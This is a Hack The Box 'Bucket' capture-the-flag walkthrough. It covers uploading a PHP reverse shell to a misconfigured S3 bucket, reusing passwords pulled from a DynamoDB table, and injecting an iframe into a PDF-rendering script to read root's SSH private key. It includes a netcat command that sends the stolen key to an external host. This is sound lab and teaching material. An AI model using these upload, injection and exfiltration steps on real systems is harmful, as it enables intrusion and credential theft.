CTF Walkthroughs, Hack The Box

Hack The Box – Bucket Walkthrough

Introduction

This was an intermediate Linux box that involved exploiting an insecure AWS S3 bucket to upload a PHP reverse shell to gain remote access, using credentials found in an unprotected DynamoDB database to gain a user shell and exploiting a vulnerable PHP script to extract the root user’s private SSH keys and escalate privileges to root through the DynamoDB database.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The Nmap scan has only detected two open ports, port 22 and 80, so the next logical step is to start enumerating HTTP.

Enumerating HTTP

When navigating to the web server through a browser, it redirects to bucket.htb and displays and error:

Adding a bucket.htb entry to the /etc/hosts file:

The site now loads properly, it appears to be a pretty standard site with not many features:

Looking at the source code, some links mention a s3bicket.htb URL:

Adding s3.bucket.htb to the /etc/hosts file:

When navigating to it, the following is displayed, indicating an S3 bucket is running:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

The /health directory mentions that S3 and DynamoDB are running

Whereas when navigating to /shell, a DynamoDB Javascript Shell comes up:

Enumerating Amazon S3 Bucket & DynamoDB

An Amazon S3 bucket is a public cloud storage resource available in Amazon Web Services’ (AWS) Simple Storage Service (S3), an object storage offering. Amazon S3 buckets, which are similar to file folders, store objects, which consist of data and its descriptive metadata. These can often be misconfigured and allow unauthenticated users to access files within the buckets or upload arbitrary files.

The AWS Command Line Interface can be used to enumerate and interact with S3 buckets. Installing the tool:

To be able to use the tool, an access ID and Key, which can be obtained by registering with AWS, are normally required, although in this scenario since the target is within the same network this won’t be necessary. The following steps can be followed to obtain an access key:

Browsing to AWS and hitting the “Create a Free Account” button:

Entering an email address, password and account name:

Navigating to the Account name–>My Security Credentials:

Under the Access keys section, the “Show Access Key” button will display the current Access ID and Key:

Running the aws configure command to setup the AWS command line tool, specifying the Access ID, Key and Region:

Since the application seems to be running DynamoDB, the AWS command line tool might have a way to interact with it. After looking up the official AWS CLI documentation, it looks like the following command can be used to interact with a DynamoDB database and issue a query to list all available tables:

aws dynamodb list-tables --endpoint-url http://sr.bucket.htb

Issuing the command returns one “users” table:

There still doesn’t seem to be a clear way to look at the records stored in this table. Using the “aws dynamodb help” command to see what commands are availablle

The scan command looks interesting, more information can be found by using the “aws dynamodb scan help” command:

After looking up the documentation for this command, it looks like all it needs as arguments is the table name:

Using the following command to view the records within the users table:

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb

It looks like this contains a few usernames and passwords, although they don’t seem to be useful at this stage.

After a bit of research, I came across this article which mentioned a few useful commands when enumerating S3 buckets, one of which is the “ls” command, which allows to list files on the bucket.

Running the ls command does not reveal any useful files unfortunately

Another useful command mentioned in the article is the “cp” command, which allows to copy local files to an S3 bucket. Since this bucket is also used as a web server, remote code execution could be achieved by uploading PHP files onto it. The cp command only requires the file to upload and the location to place the file as arguments:

Exploiting Amazon S3 Bucket File Upload

To initially test the cp command, creating a “test.txt” file and transferring it across using the following command:

aws s3 cp test.txt --endpoint-url http://s3.bucket.htb s3://adserver/test.txt

Accessing the file through the browser displays the content of it, which means the upload was successful:

The exploitation process has to be done very quickly as the server cleans up files every minute or so. Copying the laudanum PHP reverse shell to the current working directory changing the IP address and port:

Running the following command to copy the PHP reverse shell to the S3 bucket:

aws s3 cp php-reverse-shell.php --endpoint-url http://s3.bucket.htb s3://adserver/shell.php

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Navigating to the shell through the browser:

Received a call back on the Netcat listener, granting a shell as the www-data user:

The following steps can be done to obtain an interactive shell:

  • Running “python3 -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
  • Hitting CTRL+Z to background the process and go back to the local host
  • Running “stty raw -echo” on the local host
  • Hitting “fg + ENTER” to go back to the reverse shell

When enumerating files and folders in the /home directory, it appears roy’s home directory contains a db.php file within the project folder, which presumably is used start DynamoDB:

As this indicates roy may be responsible for the DynamoDB database, it is worth trying to login as roy using the credentials found earlier:

It looks like the password for the “Sysadm” user stored in the users table worked.

Privilege Escalation

Transferring the LinPEAS enumeration script to the target machine:

Making the script executable and executing it:

It appears that port 8000 is listening for incoming local connections:

And Apache seems to be running as root, so this could potentially be a privilege escalation vector:

Navigating to /var/www confirms the presence of a bucket-app folder, which is probably the web application running on port 8000:

The Apache configuration confirms it is running on port 8000

The application contains a index.php file, and at the beginning of it there is some code which looks peculiar and unrelated to the web application. Going through the code and adding comments to better understand what it is doing:

<?php
use Aws\DynamoDb\DynamoDbClient;
//if there is a post request when accessing the file
if($_SERVER["REQUEST_METHOD"]==="POST"){
//if the action post parameter is get_alerts
if($_POST["action"]==="get_alerts"){
//run a dynamodb instance on locahost port 4566
date_default_timezone_set('AmericaNew_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
//perform a scan query looking for the alerts table, with a "title" string of
"Ransomware"
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array
("S"=>"Ransomware")),
));
//go through each item in the table
foreach ($iterator as $item) {
//generate an html file wihich name is randomly generated using numbers from 1 to 10000
$name=rand(1,10000).'.html';
//put the contents of the data string of the record into the file
file_put_contents('files/'.$name,$item["data"]);
}
//convert the file to a pdf
passthru("java -Xmx512m -Djava.awt.headless=true -cp
pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out
files/result.pdf");
}
}
else
{
?>

The code above will currently fail as saw earlier there is no alerts table. By creating a table and adding HTML code to it, it should be executed and its output will be converted to a pdf file. This could allow to read arbitrary files on the machine.
First of all, the alerts table needs to be created. The create-table query can be used, after consulting the documentation, this is what it requires:

  • Table name
  • Attribute definitions for the fields
  • Key schema, to define the primary key
  • Provisioned throughput i.e. read and write capacity units for the secondary index

Using the following command to create an “alerts” table containing a data and a title string:

aws dynamodb --endpoint-url http://s3.bucket.htb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE -- provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

The next step is to insert the record into the table, using the put-item query, which requires:

  • Table name
  • Item to insert

The items within the table have to be specified using the following syntax, where “S” is the type of field (in this case string):

Using the following command to insert a record into the table containing Ransomware as title and an Iframe which when executed will generate a page containing the root user’s SSH key, which will the be converted to a PDF document:

aws dynamodb --endpoint-url http://s3.bucket.htb put-item --table-name alerts --item '{"title": {"S": "Ransomware"},"data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}}' --return-consumed-capacity TOTAL

All of these steps, along with the POST request using Curl, have to be done at the same time as the server cleans up files and database tables roughly every minute

The next step is to set up a Netcat listener, which will catch the contents of the file when they are sent to the local machine, redirecting them to a result.pdf file, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Concatenating the commands used earlier to create table and insert the record, running the following Curl command to perform a POST request and transfer the file via Netcat:

curl --data "action=get_alerts" http://localhost:8000/; nc 10.10.14.2 443 < /var/www/bucket-app/files/result.pdf

The POST request was successful and the result.pdf file was received by the Netcat listener.

After opening the generated PDF file, it appears this contains the SSH private key for the root user:

Copying the private key to a local file so it can be used with SSH:

Logging in as the root user through SSH using the private key:

Conclusion

I really enjoyed this box, as it forced me to get out of my comfort zone and play around with technologies I never used before such as AWS S3 bucket and DynamoDB. I feel like it is a quite real-life type box as it involved misconfiguraton that would be quite common and that have already been exploited in the past.